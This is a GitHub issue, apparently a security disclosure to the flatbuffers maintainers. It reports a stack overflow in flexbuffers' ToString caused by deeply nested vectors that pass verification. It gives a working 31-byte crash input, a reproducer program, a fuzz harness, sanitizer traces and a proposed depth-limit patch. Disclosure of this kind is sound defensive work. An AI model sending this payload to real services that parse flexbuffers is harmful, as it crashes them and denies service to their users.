Skip to content

Unbounded Recursion / Stack Overflow in flexbuffers::Reference::ToString via Nested Vectors #9074

@OwenSanzas

Description

@OwenSanzas

Summary

flexbuffers::Reference::ToString (and its helper
flexbuffers::AppendToString<Vector>) recurse unconditionally through
every level of a nested flexbuffers vector with zero depth tracking.
flexbuffers::VerifyBuffer accepts legitimate (non-cyclic) deeply-nested
vectors without rejecting them, so a 31-byte crafted flexbuffer passes
verification and then blows the stack on the subsequent ToString call
(~245 recursive frames deep before the guard page fires). Any consumer
that pretty-prints an attacker-controlled flexbuffer — logging, debug
dumps, JSON bridges, TFLite metadata loaders — takes a stack-overflow
crash.

Root Cause

flexbuffers::Reference::ToString is header-only inside
include/flatbuffers/flexbuffers.h. For vector-typed values it delegates
to AppendToString<Vector>, which walks every child and calls
child.ToString(...) on each, which re-enters ToString on the nested
vector, which calls AppendToString<Vector> again. This is mutual
recursion with no depth cap and no stack-budget check.

flexbuffers::VerifyBuffer bounds the number of distinct vectors via
max_vectors_ but does not cap recursion depth for legitimate
(non-overlapping) nested containers. A buffer of the form
vec[vec[vec[...]]] — one vector per nesting level, each referencing
the next — passes verification in linear time and then crashes the
walker on ToString.

Vulnerable Code — Reference::ToString (include/flatbuffers/flexbuffers.h:598-666)

void ToString(bool strings_quoted, bool keys_quoted, std::string& s,
              bool indented, int cur_indent, const char* indent_string,
              bool natural_utf8 = false) const {
  if (type_ == FBT_STRING) {
    ...
  } else if (IsVector()) {
    AppendToString<Vector>(s, AsVector(), keys_quoted, indented,
                           cur_indent + 1, indent_string, natural_utf8);
  } else if (IsTypedVector()) {
    AppendToString<TypedVector>(s, AsTypedVector(), keys_quoted, indented,
                                cur_indent + 1, indent_string, natural_utf8);
  } else if (IsFixedTypedVector()) {
    AppendToString<FixedTypedVector>(s, AsFixedTypedVector(), keys_quoted,
                                     indented, cur_indent + 1, indent_string,
                                     natural_utf8);
  }
  ...
}

Vulnerable Code — AppendToString (include/flatbuffers/flexbuffers.h:375-397)

template <typename T>
void AppendToString(std::string& s, T&& v, bool keys_quoted, bool indented,
                    int cur_indent, const char* indent_string,
                    bool natural_utf8) {
  s += "[";
  s += indented ? "\n" : " ";
  for (size_t i = 0; i < v.size(); i++) {
    if (i) { s += ","; s += indented ? "\n" : " "; }
    if (indented) IndentString(s, cur_indent, indent_string);
    v[i].ToString(true, keys_quoted, s, indented, cur_indent, indent_string,
                  natural_utf8);   // <-- unconditional recursion
  }
  ...
}

Neither function inspects cur_indent, a frame counter, or a
stack-budget sentinel. Reference::ToString recurses once per level of
nesting; AppendToString<Vector> iterates children and re-enters
ToString per child; with a vec[vec[...]] shape each level consumes
two C++ stack frames. At ~245 frames the Linux default 8 MiB stack
exhausts and the process takes a SIGSEGV on the guard page.

Vulnerability Description

flexbuffers are used to carry schema-less ML model metadata (TFLite,
on-device ML) and small IPC payloads. Any consumer that calls
Reference::ToString on an attacker-supplied buffer — which is the
expected way to serialize a flexbuffer to JSON for logging or
cross-process debugging — can be crashed deterministically with a
31-byte payload. The defect is DoS-class: there is no data leak and no
memory corruption, but the attack requires only bytes that can be
mailed through any channel that carries flexbuffers, and the
consequences are a hard process kill.

Severity

CVSS 3.1 Score: 6.5 (Medium)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Metric Value Rationale
Attack Vector Network flexbuffer bytes reach the consumer via network/IPC/model files
Attack Complexity Low 31 hand-crafted bytes trigger the crash; no race, no timing
Privileges Required None The consumer calls ToString on the first bytes received
User Interaction None Debug log / pretty-print happens automatically
Confidentiality None No read primitive
Integrity None No write primitive
Availability High Hard process kill via guard-page SIGSEGV

PoC

Crash input

31-byte crafted flexbuffer that passes VerifyBuffer and then
recurses ~245 frames deep through ToString:

76 65 63 65 46 00 00 00 01 00 00 00 02 00 00 00
03 00 00 00 62 6f 6f 6c 73 00 04 01 00 28 01
# generate_poc.py — regenerate the PoC binary from literal bytes.
poc = bytes([
    0x76, 0x65, 0x63, 0x65, 0x46, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
    0x03, 0x00, 0x00, 0x00, 0x62, 0x6f, 0x6f, 0x6c,
    0x73, 0x00, 0x04, 0x01, 0x00, 0x28, 0x01,
])
open("poc.bin", "wb").write(poc)
print(f"wrote {len(poc)} bytes to poc.bin")

Crash input size: 31 bytes.

Fuzzer Reproduction

Upstream can rebuild the libFuzzer harness that first hit this
crash by compiling the .cc source embedded below in the "Fuzz
Harness Source" section against libFuzzer + an ASan build of
libflatbuffers. The harness reuses the same ASan library
artifact produced in the Production Reproduction step below.

# Build libflatbuffers.a with ASan (pinned commit).
git clone https://github.com/google/flatbuffers.git
cd flatbuffers
git checkout e223d69b36574c4a2b10dbd27761753de81624ab

cmake -S . -B build-asan -G Ninja \
    -DCMAKE_BUILD_TYPE=Release \
    -DCMAKE_CXX_COMPILER=clang++ \
    -DCMAKE_C_FLAGS="-fsanitize=address -g -O1" \
    -DCMAKE_CXX_FLAGS="-fsanitize=address -g -O1" \
    -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
    -DFLATBUFFERS_BUILD_TESTS=OFF
cmake --build build-asan --target flatbuffers

# Compile the harness .cc from the "Fuzz Harness Source" section
# below against libFuzzer + libflatbuffers.a:
clang++ -std=c++17 -fsanitize=fuzzer,address -g -O1 \
    -I include \
    flexbuffers_typed_access_fuzzer.cc \
    build-asan/libflatbuffers.a \
    -o flexbuffers_typed_access_fuzzer

Regenerate the PoC and run the harness:

python3 generate_poc.py
ASAN_OPTIONS=detect_leaks=0 ./flexbuffers_typed_access_fuzzer poc.bin

Sanitizer output from the harness run (alternating
ToString/AppendToString<Vector> frames repeat ~245 times before
the guard page fires — abridged here):

AddressSanitizer:DEADLYSIGNAL
==1424225==ERROR: AddressSanitizer: stack-overflow on address 0x7fffafa1aff4 (pc 0x5634dbf9c70f bp 0x7fffafa1b120 sp 0x7fffafa1afc0 T0)
    #0 0x5634dbf9c70f in flexbuffers::Reference::ToString(...) const include/flatbuffers/flexbuffers.h:600
    #1 0x5634dbfa0a7e in void flexbuffers::AppendToString<flexbuffers::Vector>(...) include/flatbuffers/flexbuffers.h:387:10
    #2 0x5634dbf9d1f0 in flexbuffers::Reference::ToString(...) const include/flatbuffers/flexbuffers.h:664:7
    #3 0x5634dbfa0a7e in void flexbuffers::AppendToString<flexbuffers::Vector>(...) include/flatbuffers/flexbuffers.h:387:10
    #4 0x5634dbf9d1f0 in flexbuffers::Reference::ToString(...) const include/flatbuffers/flexbuffers.h:664:7
    ... (~245 alternating frames) ...

SUMMARY: AddressSanitizer: stack-overflow include/flatbuffers/flexbuffers.h:600 in flexbuffers::Reference::ToString(...)

Production Reproduction

flexbuffers ships no CLI, so we use a ~55-line reproducer that calls
only public headers (<flatbuffers/flexbuffers.h>). The program mirrors
the canonical consumer pattern: VerifyBuffer with a reuse_tracker
(exactly how upstream flexbuffers_verifier_fuzzer.cc does it), then
GetRoot, then Reference::ToString. The same stack-overflow top stack
reproduces, built against pinned commit
e223d69b36574c4a2b10dbd27761753de81624ab.

// repro_flexbuffers_tostring.cc — public-API reproducer for a stack
// overflow in flexbuffers::Reference::ToString when the buffer is a
// legal but deeply-nested flexbuffer that passes VerifyBuffer.
//
// Public-API only: <flatbuffers/flexbuffers.h>. No internal helpers.
//
// Usage:
//     ./repro_flexbuffers_tostring poc.bin

#include <flatbuffers/flexbuffers.h>

#include <cstdint>
#include <cstdio>
#include <cstdlib>
#include <string>
#include <vector>

int main(int argc, char** argv) {
  if (argc != 2) {
    std::fprintf(stderr, "Usage: %s <poc.bin>\n", argv[0]);
    return 2;
  }

  FILE* f = std::fopen(argv[1], "rb");
  if (!f) { std::perror("fopen"); return 2; }
  std::fseek(f, 0, SEEK_END);
  const long n = std::ftell(f);
  std::fseek(f, 0, SEEK_SET);
  if (n <= 0) {
    std::fclose(f);
    std::fprintf(stderr, "empty input\n");
    return 2;
  }
  std::vector<uint8_t> buf(static_cast<size_t>(n));
  (void)std::fread(buf.data(), 1, buf.size(), f);
  std::fclose(f);

  // Match the harness: verify first with a reuse_tracker, then walk.
  std::vector<uint8_t> reuse_tracker;
  if (!flexbuffers::VerifyBuffer(buf.data(), buf.size(), &reuse_tracker)) {
    std::fprintf(stderr, "VerifyBuffer rejected the input\n");
    return 1;
  }

  std::printf("VerifyBuffer accepted %zu bytes; calling ToString...\n",
              buf.size());
  const flexbuffers::Reference root = flexbuffers::GetRoot(buf.data(),
                                                           buf.size());
  std::string out;
  root.ToString(/*strings_quoted=*/true, /*keys_quoted=*/true, out);
  std::printf("ToString produced %zu chars\n", out.size());
  return 0;
}

Build libflatbuffers.a with ASan at the pinned commit and link the
reproducer against it:

git clone https://github.com/google/flatbuffers.git
cd flatbuffers
git checkout e223d69b36574c4a2b10dbd27761753de81624ab

cmake -S . -B build-asan -G Ninja \
    -DCMAKE_BUILD_TYPE=Release \
    -DCMAKE_CXX_COMPILER=clang++ \
    -DCMAKE_C_FLAGS="-fsanitize=address -g -O1" \
    -DCMAKE_CXX_FLAGS="-fsanitize=address -g -O1" \
    -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
    -DFLATBUFFERS_BUILD_TESTS=OFF
cmake --build build-asan --target flatbuffers

clang++ -std=c++17 -fsanitize=address -g -O1 \
    -I include \
    repro_flexbuffers_tostring.cc \
    build-asan/libflatbuffers.a \
    -o repro_flexbuffers_tostring

Regenerate the PoC bytes and run:

python3 generate_poc.py
ASAN_OPTIONS=detect_leaks=0 ./repro_flexbuffers_tostring poc.bin

Sanitizer output from the public-API repro program — same
flexbuffers.h:600 / :387 / :664 recursive alternation as the
harness run, but reached from a plain main() frame (no libFuzzer
scaffolding), which confirms any real consumer using the
VerifyBuffer → GetRoot → ToString pattern crashes identically:

AddressSanitizer:DEADLYSIGNAL
==2043459==ERROR: AddressSanitizer: stack-overflow on address 0x7ffdb52baee0 (pc 0x563eec98ba26 bp 0x7ffdb52bb240 sp 0x7ffdb52baee0 T0)
    #0 0x563eec98ba26 in flexbuffers::Reference::ToString(...) const include/flatbuffers/flexbuffers.h:600
    #1 0x563eec9925ac in void flexbuffers::AppendToString<flexbuffers::Vector>(...) include/flatbuffers/flexbuffers.h:387:10
    #2 0x563eec98c5c2 in flexbuffers::Reference::ToString(...) const include/flatbuffers/flexbuffers.h:664:7
    #3 0x563eec9925ac in flexbuffers::AppendToString<flexbuffers::Vector>(...) include/flatbuffers/flexbuffers.h:387:10
    #4 0x563eec98c5c2 in flexbuffers::Reference::ToString(...) const include/flatbuffers/flexbuffers.h:664:7
    #5 0x563eec9925ac in flexbuffers::AppendToString<flexbuffers::Vector>(...) include/flatbuffers/flexbuffers.h:387:10
    ... (~245 alternating frames) ...

SUMMARY: AddressSanitizer: stack-overflow include/flatbuffers/flexbuffers.h:600 in flexbuffers::Reference::ToString(...)

Suggested Fix

Propagate a depth counter through Reference::ToString and reject
recursion beyond a hard cap (e.g. 64, matching max_depth in the
schema-aware flatbuffers::Verify default):

--- a/include/flatbuffers/flexbuffers.h
+++ b/include/flatbuffers/flexbuffers.h
@@ -375,11 +375,13 @@ namespace flexbuffers {

 template <typename T>
 void AppendToString(std::string& s, T&& v, bool keys_quoted, bool indented,
                     int cur_indent, const char* indent_string,
-                    bool natural_utf8) {
+                    bool natural_utf8, int depth = 0) {
+  static constexpr int kMaxDepth = 64;
+  if (depth > kMaxDepth) { s += "(max-depth)"; return; }
   s += "[";
   s += indented ? "\n" : " ";
   for (size_t i = 0; i < v.size(); i++) {
     if (i) { s += ","; s += indented ? "\n" : " "; }
     if (indented) IndentString(s, cur_indent, indent_string);
     v[i].ToString(true, keys_quoted, s, indented, cur_indent, indent_string,
-                  natural_utf8);
+                  natural_utf8, depth + 1);
   }
@@ -598,7 +600,12 @@ class Reference {
   void ToString(bool strings_quoted, bool keys_quoted, std::string& s,
                 bool indented, int cur_indent, const char* indent_string,
-                bool natural_utf8 = false) const {
+                bool natural_utf8 = false, int depth = 0) const {
+    static constexpr int kMaxDepth = 64;
+    if (depth > kMaxDepth) { s += "(max-depth)"; return; }
     ...
     } else if (IsVector()) {
       AppendToString<Vector>(s, AsVector(), keys_quoted, indented,
-                             cur_indent + 1, indent_string, natural_utf8);
+                             cur_indent + 1, indent_string, natural_utf8,
+                             depth + 1);
     }

The verifier in flexbuffers::Verifier should additionally cap
nesting depth symmetrically so that invalid buffers are rejected
before ToString is ever called.

Fuzz Harness Source

// flexbuffers_typed_access_fuzzer.cc
/*
 * Copyright 2014 Google Inc. All rights reserved.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// libFuzzer harness for Logic Group: flexbuffers_typed_access
//
// Exercises the post-verify typed-access pipeline of flexbuffers.
// Upstream has a flexbuffers_verifier_fuzzer.cc that stops at
// VerifyBuffer; this harness continues past verification into
// GetRoot + Reference::As* + Vector/Map operator[] + ToString,
// recursively walking every reachable value. This is how real
// Chromium callers deserialize flexbuffer metadata, and the
// post-verify accessors are where Indirect() / ReadUInt64 /
// operator[] read schema-less bytes via byte_width_-parameterized
// reinterpret_casts.

#include <stddef.h>
#include <stdint.h>

#include <string>
#include <vector>

#include "flatbuffers/flexbuffers.h"

namespace {

// Recursively walks a flexbuffers::Reference tree, exercising every
// typed accessor and every operator[]. Bounded by a depth counter
// and the reuse tracker passed in during verify — we never recurse
// more than kMaxDepth even if the library verifier is happy to.
static constexpr int kMaxWalkDepth = 48;
static constexpr size_t kMaxChildrenPerNode = 64;

static void WalkReference(const flexbuffers::Reference& ref, int depth) {
  if (depth >= kMaxWalkDepth) return;

  // Type-level queries (no byte access).
  (void)ref.GetType();
  (void)ref.IsNull();
  (void)ref.IsNumeric();
  (void)ref.IsString();
  (void)ref.IsBlob();
  (void)ref.IsVector();
  (void)ref.IsMap();

  // Scalar accessors — each exercises a ReadInt64 / ReadUInt64 /
  // ReadDouble through flexbuffers::Indirect.
  (void)ref.AsInt64();
  (void)ref.AsUInt64();
  (void)ref.AsDouble();
  (void)ref.AsFloat();
  (void)ref.AsBool();

  // String / blob — read the bytes via AsString / AsBlob. These
  // respect the length field stored in front of the data pointer.
  if (ref.IsString()) {
    (void)ref.AsString().c_str();
    (void)ref.AsString().length();
  }
  if (ref.IsBlob()) {
    const flexbuffers::Blob blob = ref.AsBlob();
    (void)blob.size();
    (void)blob.data();
  }

  // Container recursion. Every branch uses operator[] internally.
  if (ref.IsAnyVector()) {
    const flexbuffers::Vector vec = ref.AsVector();
    const size_t len = vec.size();
    const size_t to_walk = len < kMaxChildrenPerNode ? len : kMaxChildrenPerNode;
    for (size_t i = 0; i < to_walk; ++i) {
      WalkReference(vec[i], depth + 1);
    }
  }

  if (ref.IsTypedVector()) {
    const flexbuffers::TypedVector tv = ref.AsTypedVector();
    const size_t len = tv.size();
    const size_t to_walk = len < kMaxChildrenPerNode ? len : kMaxChildrenPerNode;
    for (size_t i = 0; i < to_walk; ++i) {
      WalkReference(tv[i], depth + 1);
    }
  }

  if (ref.IsFixedTypedVector()) {
    const flexbuffers::FixedTypedVector ftv = ref.AsFixedTypedVector();
    for (size_t i = 0; i < ftv.size(); ++i) {
      WalkReference(ftv[i], depth + 1);
    }
  }

  if (ref.IsMap()) {
    const flexbuffers::Map map = ref.AsMap();
    // Iterate values positionally — Map inherits from Vector so the
    // base operator[] is the integer version; that's the
    // std::bsearch-free path.
    const flexbuffers::Vector vals = map.Values();
    const flexbuffers::TypedVector keys = map.Keys();
    const size_t len = vals.size();
    const size_t to_walk = len < kMaxChildrenPerNode ? len : kMaxChildrenPerNode;
    for (size_t i = 0; i < to_walk; ++i) {
      // Exercise both key and value slots.
      WalkReference(keys[i], depth + 1);
      WalkReference(vals[i], depth + 1);
    }
    // And exercise the string-keyed operator[] on a known-good key
    // pulled from the buffer itself — this drives the bsearch +
    // KeyCompare path.
    if (len > 0) {
      const flexbuffers::Reference key_ref = keys[0];
      if (key_ref.IsString() || key_ref.IsKey()) {
        const std::string key_str = key_ref.AsString().str();
        (void)map[key_str.c_str()];
      }
    }
  }

  // Finally run the pretty-printer, which itself walks every child
  // via AppendToString and is the highest-coverage single call.
  std::string tmp;
  ref.ToString(/*strings_quoted=*/true, /*keys_quoted=*/true, tmp);
}

}  // namespace

extern "C" int LLVMFuzzerTestOneInput(const uint8_t* data, size_t size) {
  // flexbuffers::VerifyBuffer requires size >= 3 (two suffix bytes
  // + at least one root byte). Anything smaller will bail the
  // verifier but still drive it safely.
  if (size == 0 || size > (1u << 20)) return 0;

  // Step 1: verify with a reuse tracker. This is the path the
  // upstream flexbuffers_verifier_fuzzer.cc uses; we keep it
  // verbatim so the post-verify walk we add on top does not run
  // on unverified bytes (P3).
  std::vector<uint8_t> reuse_tracker;
  if (!flexbuffers::VerifyBuffer(data, size, &reuse_tracker)) return 0;

  // Step 2: get the root reference. Note the in-header GetRoot
  // reads the last two bytes of the buffer, so it is safe only
  // after VerifyBuffer passed (which we just did).
  const flexbuffers::Reference root = flexbuffers::GetRoot(data, size);

  // Step 3: walk. This is the disjoint-from-existing-fuzzer work.
  WalkReference(root, /*depth=*/0);

  return 0;
}

Build flags: clang++ -std=c++17 -fsanitize=fuzzer,address -g -O1 -I flatbuffers/include/
Library linkage: libflatbuffers.a -lpthread
Corpus: seed inputs in standard fuzzer corpus directory.
Harness quirks: Input size is capped at 1 MiB as a wall-clock optimization; the harness's own walker has a kMaxWalkDepth=48 cap, but that only bounds the hand-rolled walk — the final ref.ToString(true, true, tmp) call delegates to the library's own printer which has no depth limit, and that is where the stack overflows.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions